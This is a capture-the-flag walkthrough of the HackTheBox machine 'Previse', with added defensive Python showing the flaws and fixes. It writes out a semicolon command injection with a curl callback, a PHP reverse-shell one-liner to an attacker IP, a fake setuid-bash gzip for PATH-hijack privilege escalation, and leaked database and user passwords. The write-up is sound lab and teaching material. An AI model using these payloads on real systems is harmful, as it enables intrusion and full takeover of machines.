Previse - 21st Aug 2021: Scanning

This document provides instructions for pen testing a machine located at the IP address 10.10.11.104. It describes running scans like Masscan and Nmap to identify open ports. It then discusses using the gobuster tool to enumerate directories on the web server. The document finds a vulnerability that allows command injection on the site. It provides steps to use this flaw to retrieve a reverse PHP shell and gain remote access to the system.

Purp1eW0lf

Scanning

We can run masscan_to_nmap.py, a tool I made that you can find on my Github. It runs a
Masscan, identifies open ports, and then takes those open ports over to Nmap, and scans for
versions and default scripts against those ports.

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php

Enumeration

Let's enumerate the directories with gobuster.

sudo gobuster dir -u http://10.10.11.104 -w \
  /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \
  -t 50 -x php

We eventually get a hit for nav.php.

/nav.php

If we traverse to nav.php, we find some interesting options.

But every time we try to click on something we get redirected!

Burpsuite

We can leverage Burpsuite to stop the site from redirecting us.

Intercept the request to create an account. Send that to Repeater, and then look at what
accounts.php holds for us. If we can traverse to accounts.php, we will be able to create an
admin-level account on this website.

In Burpsuite's Proxy tab, right-click and choose "Do intercept", then "Response to this request".

Once we forward a couple of times, we get this page. See line 1? Change it from a 302 status
code to 200, and then forward on further.

And in the browser, we are given a sneaky route to the user creation page.
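
The redirect bypass above works because of a server-side mistake, not a Burp trick: a handler that issues a redirect but keeps rendering the protected page sends that page in the body of the 302, and a proxy only has to change the status line to make the browser show it. The following Python stand-in is an added example, not the site's PHP; the page names, the session layout and the form text are assumptions. It puts the vulnerable flow beside the corrected one and models the status rewrite the proxy performs.

```python
"""Redirect-without-exit: the server-side mistake behind the 302 -> 200 trick.

Added illustrative example in Python, not the site's PHP. The page names,
the session dictionary and the form text are assumptions."""


def render_account_form():
    # Stand-in for the HTML the account-creation page produces.
    return "<form action='accounts.php' method='post'>create user</form>"


def vulnerable_handler(session):
    """Mirrors header('Location: login.php') with no exit afterwards.

    The status line says 'redirect', but execution falls through and the
    protected form is still written into the response body."""
    out = []
    status = 200
    if "user" not in session:
        status = 302  # redirect decided here ...
    out.append(render_account_form())  # ... yet rendering continues
    return status, "".join(out)


def hardened_handler(session):
    """Returns as soon as the redirect is decided: an unauthenticated client
    gets an empty body, so rewriting the status in a proxy gains nothing."""
    if "user" not in session:
        return 302, ""
    return 200, render_account_form()


def proxy_rewrite_status(response):
    """What the Burp step does: change the status code, keep the body."""
    _status, body = response
    return 200, body


def leaks_protected_page(handler):
    """True if an unauthenticated request, with its status rewritten to 200,
    still delivers the account form."""
    _status, body = proxy_rewrite_status(handler({}))
    return "create user" in body


if __name__ == "__main__":
    print("vulnerable handler leaks form:", leaks_protected_page(vulnerable_handler))
    print("hardened handler leaks form:  ", leaks_protected_page(hardened_handler))
```

In PHP the equivalent fix is to call exit (or die) immediately after header('Location: ...'); the hardened handler mirrors that by returning as soon as the redirect is decided, and the check that matters when reviewing such code is whether anything at all is emitted after the redirect header.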

Exploit Site

Pick whatever creds you want, sign in, and then let's get to work.

We can look under Files and download a zip of the entire site.

Reading through, we find some credentials that may be useful later.

Looking hard at line 19 of logs.php in the zip, we can also see a strange Python flaw. Here, it
seems like we may be able to exec() whatever we like and get a shell on the box. Let's find out!

Command Injection

If we go to http://10.10.11.104/file_logs.php, we can try to download one of the files here.

Intercept it in Burp, and then leverage a semi-colon to test whether we get command execution and
have the machine hit us back with a curl.

# on kali
sudo nc -nvlp 80

# in burpsuite
; curl [your IP]/test
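
To see what the semicolon does to the script behind logs.php, and how an operator would spot such a request afterwards, here is an added Python example. It is not the site's logs.php (whose source the notes only summarise); the parameter name delim, the script path placeholder and the access-log lines are assumed or constructed. It shows the vulnerable string-concatenation pattern beside an allowlisted argv build that never touches a shell, and a check over Apache access-log lines for shell metacharacters in query parameters.

```python
"""Command injection through a shelled-out script parameter.

Added illustrative example, not the site's logs.php. The 'delim' parameter,
the script path placeholder and the sample log lines are assumed/constructed."""
import re
from urllib.parse import unquote_plus

LOG_SCRIPT = "/path/to/log_process.py"   # placeholder, not the real path
ALLOWED_DELIMS = {"comma": ",", "space": " ", "tab": "\t"}


def build_vulnerable_command(delim):
    """User input glued into one string handed to a shell: a ';' inside
    'delim' ends the intended command and whatever follows runs as well."""
    return "python " + LOG_SCRIPT + " " + delim


def build_hardened_argv(delim):
    """Reject anything outside the allowlist and return argv as a list,
    to be run with subprocess.run(argv) and no shell=True, so no shell
    ever parses the user's value."""
    if delim not in ALLOWED_DELIMS:
        raise ValueError("unsupported delimiter: %r" % delim)
    return ["python", LOG_SCRIPT, ALLOWED_DELIMS[delim]]


# Shell metacharacters that end or chain commands.
SHELL_META = re.compile(r"[;|`\n]|&&|\$\(")

# Apache combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def find_injection_attempts(lines):
    """Return (client, path, param, decoded value) for every query-string
    parameter carrying a shell metacharacter. GET only: POST bodies are not
    in the access log, so this is the cheap check, not a complete one."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        for pair in query.split("&"):
            if not pair:
                continue
            param, _, raw = pair.partition("=")
            value = unquote_plus(raw)      # %3B -> ';', '+' -> ' '
            if SHELL_META.search(value):
                hits.append((m["client"], path, param, value))
    return hits


# Constructed sample lines; addresses and timestamps are made up.
SAMPLE_LOG = [
    '10.10.14.5 - - [21/Aug/2021:10:01:12 +0000] "GET /file_logs.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [21/Aug/2021:10:02:47 +0000] "GET /logs.php?delim=comma HTTP/1.1" 200 210 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [21/Aug/2021:10:03:02 +0000] "GET /logs.php?delim=comma%3B+curl+10.10.14.5%2Ftest HTTP/1.1" 200 210 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print("possible injection from %s on %s (%s=%r)" % hit)
```

The allowlist is the important half: escaping a value that is then handed to a shell is fragile, whereas mapping a short token to a fixed argument and passing argv as a list leaves nothing for a shell to interpret.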

Reverse Shell

Now, we can leverage this command injection to get a reverse shell. We know the web server
has PHP on it, so let's use a PHP reverse shell and be sure to URL encode it (ctrl+u) in
Burpsuite. This ensures bad characters won't ruin it for us.

php -r '$sock=fsockopen("1.x.x.x",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

And we get a shell

WWW-Data Shell

If we run netstat -plunt, we can see that port 3306 is listening internally only; typically MySQL
runs on this port.

Earlier, when we downloaded the backup zip of the website, we found SQL creds:

User: root
DB: previse
Pass: mySQL_p@ssw0rd!:)

MySQL

Run this command, and then at the password prompt enter the password (ignore any errors):

mysql -u root -D previse -p
# mySQL_p@ssw0rd!:)

Now, we want to see what tables there are: show tables;

Okay awesome, now let's see what's in the accounts table: select * from accounts;

Crack the Hash

Copy and paste the usernames and hashes into a file and run John:

john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long

Eventually, we get the password for m4lwhere: ilovecody112235!

M4lwhere shell

Back in our victim shell, we can now escalate to the m4lwhere user.

su m4lwhere
# ilovecody112235!

And then we can get the user flag.

Enumerate II

If we run sudo -l, we can see we are allowed to run a backup script as root.

If we read this backup script, it calls on gzip to do some work. Don't get too distracted by what
it does; notice that gzip isn't given its full path. Because the full path isn't given, we can
create a malicious gzip binary and the script will call on this instead.

PrivEsc

We need to create our malicious gzip, and then change the PATH so the sudo script calls on the
'malicious gzip' chilling in /tmp.

# create malicious gzip, and use full paths for binaries
echo "/bin/cp /bin/bash /tmp/bash; /bin/chmod +s /tmp/bash" > /tmp/gzip

# make the fake gzip executable
chmod +x /tmp/gzip

# change path
export PATH=/tmp

# run the script with the full binary path of sudo
/usr/bin/sudo /opt/scripts/access_backup.sh

Ignore any errors that sudo gives you; in your /tmp directory, a new /tmp/bash binary should
now exist.

Change your path back, and execute the new bash to become root.

# change path back
source /etc/environment

# execute the new bash binary for root
/tmp/bash -p

$6$QJgW9tG2$yIhp0MQm9b4ok8j9su9H0hJ.GuwI5AHusMrZBQv2oLfvotY5YR0MJ82zJ4xi5WCKQSWn/a3HO/M/TjS/YC0Mk1

Password is the root hash, starting with $6$QJg and ending with /YC0Mk1.
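
The privilege escalation above hinges on one line of the backup script naming gzip without a full path, so the name is resolved through whatever PATH the caller brought in. The following Python lint is an added example (mine, not the box's /opt/scripts/access_backup.sh; the two scripts it analyses are constructed stand-ins): it reads a shell script, reports every external command not called by absolute path, and checks whether the script pins PATH itself, which is what an administrator would run over anything granted through sudo.

```python
"""Audit a shell script for PATH-hijack exposure.

Added illustrative example; the two scripts below are constructed stand-ins,
not the box's access_backup.sh."""
import re
import shlex

# Words that are shell builtins/keywords rather than external programs.
BUILTINS = {
    "if", "then", "else", "elif", "fi", "for", "while", "do", "done", "case",
    "esac", "export", "cd", "echo", "set", "exit", "return", "read", "local",
    "test", "[", "shift", "unset", "source", ".", "true", "false",
}
ASSIGNMENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")
SEPARATORS = re.compile(r"\|\||&&|[|;]")
PATH_SET = re.compile(r"^\s*(export\s+)?PATH=")


def unqualified_commands(script_text):
    """Return [(line_no, command)] for each external command invoked by bare
    name, i.e. resolved through PATH at run time."""
    found = []
    for no, line in enumerate(script_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for segment in SEPARATORS.split(stripped):
            try:
                words = shlex.split(segment, comments=True)
            except ValueError:
                continue  # unbalanced quotes; skip rather than guess
            # Drop leading VAR=value prefixes such as 'LC_ALL=C cmd'.
            while words and ASSIGNMENT.match(words[0]):
                words.pop(0)
            if not words:
                continue
            cmd = words[0]
            if cmd in BUILTINS or cmd.startswith("/"):
                continue
            found.append((no, cmd))
    return found


def sets_path_explicitly(script_text):
    """True if the script assigns PATH itself instead of trusting the caller's."""
    return any(PATH_SET.match(line) for line in script_text.splitlines())


# Constructed stand-in: relies on whatever PATH the caller brings in.
VULNERABLE_SCRIPT = """#!/bin/bash
# archive the web access log
cd /var/www/html
gzip -c file_access.log > /var/backups/access.gz
chmod 600 /var/backups/access.gz
"""

# Constructed stand-in: pins PATH and names every program by full path.
HARDENED_SCRIPT = """#!/bin/bash
# archive the web access log
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /var/www/html
/bin/gzip -c file_access.log > /var/backups/access.gz
/bin/chmod 600 /var/backups/access.gz
"""

if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE_SCRIPT), ("hardened", HARDENED_SCRIPT)):
        print(name, "pins PATH:", sets_path_explicitly(text),
              "unqualified:", unqualified_commands(text))
```

The script is only half of the check: if sudo replaces PATH through secure_path (Ubuntu's stock /etc/sudoers sets it), the caller's PATH never reaches the script at all, so an environment in which this hijack works means that protection is absent or overridden for the rule, and /etc/sudoers deserves the same review as the script.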
